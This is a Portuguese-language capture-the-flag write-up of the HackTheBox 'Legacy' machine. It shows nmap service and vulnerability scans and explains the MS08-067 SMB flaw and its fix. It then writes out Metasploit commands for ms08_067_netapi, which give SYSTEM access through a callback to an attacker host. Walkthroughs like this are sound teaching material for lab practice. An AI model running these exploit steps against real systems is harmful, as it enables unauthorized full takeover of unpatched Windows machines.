Exploração prática do Windows SMB: Legacy CTF

Legacy

Legacy é uma máquina relativamente direta ao ponto, direcionada para iniciantes, que demonstra os riscos de segurança em potencial do SMB no Windows.

HackTheBox Logo

HackTheBox

O HackTheBox fornece aos indivíduos, empresas e universidades as ferramentas necessárias para melhorar continuamente as suas capacidades de cibersegurança - tudo num só lugar.

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security é uma plataforma online dedicada a fornecer artigos informativos sobre cibersegurança, privacidade e programação.

Enumeração de Serviços

O Behind Security usou a ferramenta nmap no endereço IP 10.10.10.4 e conseguiu identificar que as portas TCP 135, 139 e 445 estão abertas.

Comando: nmap -sV -sC -T4 10.10.10.4 -v -Pn

É importante notar a presença da opção -Pn, indicando que o nmap não verificará se o host está ativo. Isso é particularmente útil neste caso, já que a máquina de destino não está respondendo a solicitações ICMP.

Enumeração do SMB

Behind Security usou a ferramenta Nmap, especificando scripts para detecção de vulnerabilidades da NSE (Nmap Scripting Engine). O comando utilizado foi: nmap -sV –script=vuln -T4 10.10.10.4 -p135,139,445 -v -Pn, e os resultados são apresentados abaixo.

A saída indica que o servidor SMB é vulnerável à exploração de execução remota de código (RCE) ms08-067.

Acesso Inicial – Execução Remota de Código (CVE-2008-4250)

Explicação da Vulnerabilidade: Essa vulnerabilidade pode permitir a execução remota de código se um sistema afetado receber uma solicitação RPC especialmente criada. Em sistemas Microsoft Windows 2000, Windows XP e Windows Server 2003, um atacante poderia explorar essa vulnerabilidade sem autenticação para executar código arbitrário. É possível que essa vulnerabilidade possa ser utilizada para criar um exploit que se propaga automaticamente (wormable exploit). A vulnerabilidade foi identificada como CVE-2008-4250 e mais informações podem ser encontradas aqui.

Correção da Vulnerabilidade: A Microsoft lançou uma atualização para corrigir esse problema conhecido. Mais informações podem ser vistas aqui.

Gravidade: Crítico

Passos para Reproduzir o Ataque: Existe um módulo do Metasploit publicamente disponível para explorar essa vulnerabilidade.

msf6> use exploit/windows/smb/ms08_067_netapi
msf6> set RHOSTS 10.10.10.4
msf6> set LHOST attacker-ip
msf6> set TARGET 6
msf6> run


Captura de tela:

Pós-Exploração

O servidor SMB está sendo executado como SYSTEM e uma exploração bem-sucedida resultaria em um atacante remoto obtendo privilégios administrativos na máquina. Isso significa que o atacante teria controle completo sobre o sistema comprometido, podendo executar comandos com os mais altos níveis de permissões e acesso a todos os recursos do sistema.

Prova de Exploração: user.txt CENSURADO
Prova de Exploração: root.txt CENSURADO
Rolar para cima